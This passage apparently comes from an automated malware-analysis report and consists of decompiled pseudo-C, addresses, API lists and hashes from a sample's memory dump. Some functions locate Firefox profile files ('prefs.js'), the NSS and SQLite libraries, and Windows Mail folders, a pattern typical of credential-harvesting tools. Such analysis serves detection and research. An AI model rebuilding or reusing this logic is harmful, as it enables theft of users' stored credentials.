					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                  0x00410e8a
                                                  0x00410e92
                                                  0x00410e95
                                                  0x00410e9c
                                                  0x00410ea0
                                                  0x00410ea3
                                                  0x00410f5b
                                                  0x00410f5b
                                                  0x00000000
                                                  0x00410f5f
                                                  0x00410ea9
                                                  0x00410eb0
                                                  0x00410eb3
                                                  0x00410eb3
                                                  0x00410eb6
                                                  0x00410eb6
                                                  0x00410eb6
                                                  0x00410ebb
                                                  0x00410ec8
                                                  0x00410ebd
                                                  0x00410ebd
                                                  0x00410ebd
                                                  0x00410ecb
                                                  0x00410ecb
                                                  0x00410ed0
                                                  0x00410edd
                                                  0x00410ed2
                                                  0x00410ed2
                                                  0x00410ed2
                                                  0x00410ee0
                                                  0x00410ee4
                                                  0x00410eef
                                                  0x00410ee6
                                                  0x00410ee6
                                                  0x00410ee6
                                                  0x00410ef1
                                                  0x00410ef6
                                                  0x00410f03
                                                  0x00410ef8
                                                  0x00410ef8
                                                  0x00410ef8
                                                  0x00410f14
                                                  0x00410f1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00410f29
                                                  0x00410f31
                                                  0x00410f6f
                                                  0x00410f74
                                                  0x00000000
                                                  0x00410f74
                                                  0x00410f39
                                                  0x00410f3c
                                                  0x00410f40
                                                  0x00410f43
                                                  0x00410f4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00410f4b
                                                  0x00410f65
                                                  0x00410f6a
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen
                                                  • String ID: >$>$>
                                                  • API String ID: 39653677-3911187716
                                                  • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                  • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                  • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                  • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                  0x0040bc72
                                                  0x0040bc74
                                                  0x0040bc76
                                                  0x0040bc79
                                                  0x0040bc7f
                                                  0x0040bc82
                                                  0x0040bc84
                                                  0x0040bc84
                                                  0x0040bc8c
                                                  0x0040bc92
                                                  0x0040bc95
                                                  0x0040bcc7
                                                  0x0040bcca
                                                  0x0040bcce
                                                  0x0040bcd1
                                                  0x0040bcda
                                                  0x0040bcdf
                                                  0x0040bce7
                                                  0x0040bcec
                                                  0x0040bcf0
                                                  0x0040bcf3
                                                  0x0040bcf3
                                                  0x0040bcd1
                                                  0x0040bcf6
                                                  0x0040bcf7
                                                  0x0040bcfd
                                                  0x0040bc97
                                                  0x0040bc99
                                                  0x0040bc9a
                                                  0x0040bc9e
                                                  0x0040bca2
                                                  0x0040bcb0
                                                  0x0040bcb5
                                                  0x0040bcbd
                                                  0x0040bcc2
                                                  0x0040bcc5
                                                  0x00000000
                                                  0x0040bca4
                                                  0x0040bca4
                                                  0x0040bca5
                                                  0x0040bca8
                                                  0x0040bca8
                                                  0x0040bca2
                                                  0x0040bd0a

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  • API String ID: 3510742995-2766056989
                                                  • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                  • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                  • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                  • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406F6F, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L004115D0();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L004115D6();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                  0x00406f6f
                                                  0x00406f70
                                                  0x00406f70
                                                  0x00406f73
                                                  0x00406f77
                                                  0x00406f8a
                                                  0x00406f8a
                                                  0x00406f8e
                                                  0x00406f90
                                                  0x00406f96
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406fa3
                                                  0x00406fa4
                                                  0x00406fa9
                                                  0x00406fb3
                                                  0x00406fb5
                                                  0x00406fba
                                                  0x00406fc1
                                                  0x00406fcb
                                                  0x00406fcd
                                                  0x00406fce
                                                  0x00406fd3
                                                  0x00406fda
                                                  0x00406fe3
                                                  0x00406f79
                                                  0x00406f79
                                                  0x00406f7b
                                                  0x00406f7d
                                                  0x00406f82
                                                  0x00406f83
                                                  0x00406f86
                                                  0x00406f88
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f88
                                                  0x00406ff3
                                                  0x00406ff6
                                                  0x00406fff
                                                  0x00406fff
                                                  0x00406fe8
                                                  0x00406fec

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                  • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                  • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                  • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EFAE, Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040EF36;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                  0x0040efb8
                                                  0x0040efbc
                                                  0x0040efbe
                                                  0x0040efc6
                                                  0x0040efcb
                                                  0x0040efd1
                                                  0x0040efd5
                                                  0x0040efd9
                                                  0x0040efdc
                                                  0x0040efdf
                                                  0x0040efe6
                                                  0x0040efed
                                                  0x0040eff0
                                                  0x0040eff6
                                                  0x0040effa
                                                  0x0040effc
                                                  0x0040f004
                                                  0x0040f00c
                                                  0x0040f016
                                                  0x0040f017
                                                  0x0040f01d
                                                  0x0040f01e
                                                  0x0040f025
                                                  0x0040f028
                                                  0x0040f02e
                                                  0x0040f02e
                                                  0x0040f031
                                                  0x0040f036

                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                  • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                  • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                  • strcpy.MSVCRT(?,?), ref: 0040F017
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathstrcpy
                                                  • String ID:
                                                  • API String ID: 409945605-0
                                                  • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                  • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                  • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                  • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                  0x0040a437
                                                  0x0040a44c
                                                  0x0040a44f
                                                  0x0040a45d
                                                  0x0040a46d
                                                  0x0040a474
                                                  0x0040a476
                                                  0x0040a479
                                                  0x0040a487
                                                  0x0040a49a
                                                  0x0040a49f
                                                  0x0040a4aa
                                                  0x00000000
                                                  0x0040a4c0
                                                  0x0040a4c7

                                                  APIs
                                                    • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                    • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                  • sprintf.MSVCRT ref: 0040A45D
                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                    • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                  • sprintf.MSVCRT ref: 0040A487
                                                  • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                  • String ID:
                                                  • API String ID: 919693953-0
                                                  • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                  • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                  • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                  • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F3BA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E0040F3BA(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E0040614B( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                                  0x0040f3d5
                                                  0x0040f3dc
                                                  0x0040f3e4
                                                  0x0040f3f6
                                                  0x0040f3ff
                                                  0x0040f414
                                                  0x0040f401
                                                  0x0040f40b
                                                  0x0040f411
                                                  0x0040f422
                                                  0x0040f42b
                                                  0x0040f432

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F3DC
                                                  • strlen.MSVCRT ref: 0040F3E4
                                                  • strlen.MSVCRT ref: 0040F3F1
                                                    • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                    • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$memsetstrcatstrcpy
                                                  • String ID: sqlite3.dll
                                                  • API String ID: 1581230619-1155512374
                                                  • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                  • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                  • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                  • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}











                                                  0x0040990e
                                                  0x00409910
                                                  0x00409917
                                                  0x00409926
                                                  0x0040992d
                                                  0x00409939
                                                  0x0040993d
                                                  0x00409943
                                                  0x00409957
                                                  0x00409971

                                                  APIs
                                                  • memset.MSVCRT ref: 00409917
                                                  • memset.MSVCRT ref: 0040992D
                                                    • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                    • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                  • sprintf.MSVCRT ref: 00409957
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                  • String ID: </%s>
                                                  • API String ID: 3202206310-259020660
                                                  • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                  • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                  • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                  • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406734, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406734(char* __edi, char* _a4) {
				char* _t12;
				int _t13;

				_t12 = __edi;
				_t13 = strlen(__edi);
				if(strlen(_a4) + _t13 < 0x104) {
					_t2 =  &_a4; // 0x410d64
					strcat(_t13 + __edi,  *_t2);
				}
				return _t12;
			}





                                                  0x00406734
                                                  0x0040673f
                                                  0x0040674f
                                                  0x00406751
                                                  0x00406758
                                                  0x0040675e
                                                  0x00406762

                                                  APIs
                                                  • strlen.MSVCRT ref: 00406736
                                                  • strlen.MSVCRT ref: 00406741
                                                  • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strlen$strcat
                                                  • String ID: dA
                                                  • API String ID: 2335785903-82490789
                                                  • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                  • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                  • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                  • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E004078FF(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                  0x00402221
                                                  0x00402225
                                                  0x0040222b
                                                  0x0040222f
                                                  0x00402231
                                                  0x00402234
                                                  0x00402312
                                                  0x00402315
                                                  0x00000000
                                                  0x004023c2
                                                  0x0040231b
                                                  0x0040231c
                                                  0x00000000
                                                  0x004023ba
                                                  0x00402322
                                                  0x00402323
                                                  0x00000000
                                                  0x004023b2
                                                  0x00402329
                                                  0x0040232a
                                                  0x00402349
                                                  0x00402352
                                                  0x00402366
                                                  0x0040237a
                                                  0x0040238e
                                                  0x004023a2
                                                  0x0040228e
                                                  0x00000000
                                                  0x0040228e
                                                  0x004023a8
                                                  0x00402395
                                                  0x00402395
                                                  0x00402395
                                                  0x00402381
                                                  0x00402381
                                                  0x00402381
                                                  0x0040236d
                                                  0x0040236d
                                                  0x0040236d
                                                  0x00000000
                                                  0x00402359
                                                  0x00402359
                                                  0x004022b7
                                                  0x00000000
                                                  0x004022b7
                                                  0x00402352
                                                  0x0040232c
                                                  0x0040232d
                                                  0x00000000
                                                  0x00402341
                                                  0x00402330
                                                  0x00000000
                                                  0x00000000
                                                  0x00402336
                                                  0x0040227e
                                                  0x00402280
                                                  0x00402282
                                                  0x00402284
                                                  0x00402285
                                                  0x00402286
                                                  0x0040228b
                                                  0x00000000
                                                  0x00402280
                                                  0x0040223a
                                                  0x0040230a
                                                  0x00000000
                                                  0x0040230a
                                                  0x00402243
                                                  0x004022d5
                                                  0x004022fa
                                                  0x00000000
                                                  0x004022ff
                                                  0x0040224b
                                                  0x00000000
                                                  0x004022c1
                                                  0x00402250
                                                  0x004022b1
                                                  0x00000000
                                                  0x004022b1
                                                  0x00402255
                                                  0x00000000
                                                  0x004022a0
                                                  0x0040225a
                                                  0x00000000
                                                  0x00402295
                                                  0x0040225f
                                                  0x00402278
                                                  0x00000000
                                                  0x00402278
                                                  0x00402264
                                                  0x00000000
                                                  0x00000000
                                                  0x0040226d
                                                  0x00402274
                                                  0x0040226f
                                                  0x0040226f
                                                  0x0040226f
                                                  0x00402271
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _ultoasprintf
                                                  • String ID: %s %s %s
                                                  • API String ID: 432394123-3850900253
                                                  • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                  • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                  • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                  • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D37A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				intOrPtr* _t43;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t43 = __ecx;
				E00406E68( &_v1300, __eflags, "*.*", _a4);
				while(E00406EC3( &_v1300) != 0) {
					__eflags = E00406E2D( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L004115B2();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E0040614B( &_v652);
								if(__eflags != 0) {
									E0040D1EC(_t43, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D37A(_t43, __eflags,  &_v652, _a8);
					}
				}
				E00406F5B( &_v1300);
				return 1;
			}











                                                  0x0040d386
                                                  0x0040d391
